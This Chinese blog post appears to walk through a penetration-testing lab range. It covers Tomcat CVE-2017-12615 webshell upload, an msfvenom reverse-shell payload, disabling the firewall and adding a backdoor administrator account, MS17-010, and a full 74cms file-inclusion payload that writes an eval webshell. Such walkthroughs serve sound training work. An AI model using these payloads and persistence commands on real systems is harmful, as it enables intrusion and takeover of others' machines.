当前位置: 首页 > news >正文

【Cyberstrikelab】lab2

环境信息

Kali的IP地址:172.16.233.2

主机扫描

sudo nmap -sS 192.168.10.0/24

发现3台主机:192.168.10.10、192.168.10.20、192.168.10.233

Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-25 06:01 EDT
Nmap scan report for 192.168.10.10
Host is up (0.074s latency).
Not shown: 995 closed tcp ports (reset)
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
808/tcp  open  ccproxy-http
3306/tcp open  mysqlNmap scan report for 192.168.10.20
Host is up (0.075s latency).
Not shown: 987 closed tcp ports (reset)
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
8009/tcp  open  ajp13
8080/tcp  open  http-proxy
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49157/tcp open  unknown
49158/tcp open  unknown
49159/tcp open  unknown

192.168.10.20

访问8080端口出现Tomcat后台

CVE-2017-12615

使用TomcatScanPro对Tomcat进行扫描,发现存在CVE-2017-12615漏洞

访问写入的webshell,发现是可以的

查看下TomcatScanPro的配置文件,可知写入的webshell密码为pass

使用哥斯拉进行连接

得到flag

webshell的权限比较低

用下PetitPotam提权

上线msf

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.233.2 LPORT=6000 -f exe -o win2012.exe

在kali上开启监听

这里用哥斯拉将win2012木马上传到C:/Users/Public中再运行,我上传到网站目录无法运行得到shell

进程迁移+添加路由

添加代理

收集内网信息

发现还有一个192.168.20.0网段

如果这里哥斯拉出现中文乱码,修改下编码即可

关闭防火墙&开启远程连接&添加用户&添加管路员组

# 闭目标防火墙
netsh advfirewall set allprofiles state off
# 打开远程桌面
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /
# 添加组,添加账户
net user dfz 123@abc /add
net localgroup Administrators dfz /add
# 解决“要求的函数不受支持”错误
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f    

fscan

登录远程桌面并上传fscan扫描内网

发现另一台内网主机192.168.20.30

但是扫描并没有什么收获

看到192.168.20.30是win2008的系统,虽然fscan没有爆ms17_010但是可以进行尝试

windows/smb/ms17_010_eternalblue

上线CS

192.168.10.10

访问192.168.10.10的808端口发现是骑士CMS

骑士CMS文件包含漏洞

有一个文件包含getshell的漏洞,影响范围:骑士cms

先发送一个post包

POST地址:http://192.168.10.10:808/index.php?m=home&a=assign_resume_tplPOST内容:variable=1&tpl=<?php fputs(fopen("shell.php","w"),"<?php eval(\$_POST[x]);?>")?>; ob_flush();?>/r/n<qscms/company_show 列表名="info" 企业id="$_GET['id']"/>

对应的目录就会生成当前时间的日志文件

然后再包含下这个日志文件,这里注意你当时的时间,因为日志文件名称是以日期来命名的。

POST内容:variable=1&tpl=data/Runtime/Logs/Home/25_04_25.log

这样当我们访问这个日志文件的时候,我们之前的webshell代码就会执行,在目录下生成一个shell.php的一句话木马

用哥斯拉进行连接

得到flag

收集内网信息

发现只有一个网段,故这个主机渗透就到此为止

http://www.lqws.cn/news/578647.html

相关文章:

  • 百胜软件获邀走进华为,AI实践经验分享精彩绽放
  • 使用 C++ 和 OpenCV 构建驾驶员疲劳检测软件
  • C++ STL之string类
  • 如何让宿主机完全看不到Wi-Fi?虚拟机独立联网隐匿上网实战!
  • Webpack优化详解
  • 赋能低压分布式光伏“四可”建设,筑牢电网安全新防线
  • 爬虫详解:Aipy打造自动抓取代理工具
  • UI前端与数字孪生融合新趋势:智慧医疗的可视化诊断辅助
  • 2025年XXE攻击全面防御指南:从漏洞原理到智能防护实践
  • python 利用socketio(WebSocket协议)实现轻量级穿透方案
  • GO 语言学习 之 Map
  • PyTorch 中 nn.Linear() 参数详解与实战解析(gpt)
  • K8s环境下基于Nginx WebDAV与TLS/SSL的文件上传下载部署指南
  • 极易搭建的自助Git服务Gogs
  • LeetCode 594. Longest Harmonious Subsequence
  • Hyperledger Fabric 入门笔记(二十一)Fabric V2.5 使用K8S部署测试网络
  • UI_NGUI_三大基础控件
  • 祛魅 | 在祛魅中成长,在成长中祛魅
  • DAY 43 预训练模型
  • 完整的ROS节点来实现果蔬巡检机器人建图与自主避障系统
  • 《从量子奇境到前端优化:解锁卡西米尔效应的隐藏力量》
  • API接口安全-1:身份认证之传统Token VS JWT
  • VMware 在局域网环境将虚拟机内部ip 端口开放
  • 使用SRS+ffmpeg实现https推流flv
  • python+uniapp基于微信小程序面向品牌会员的在线商城系统
  • 如何让Excel自动帮我们算加减乘除?
  • 基于llama-factory+ollama+vllm加速大模型训推生产
  • 深入 ARM-Linux 的系统调用世界
  • C++ std::list详解:深入理解双向链表容器
  • 分库分表之实战-sharding-JDBC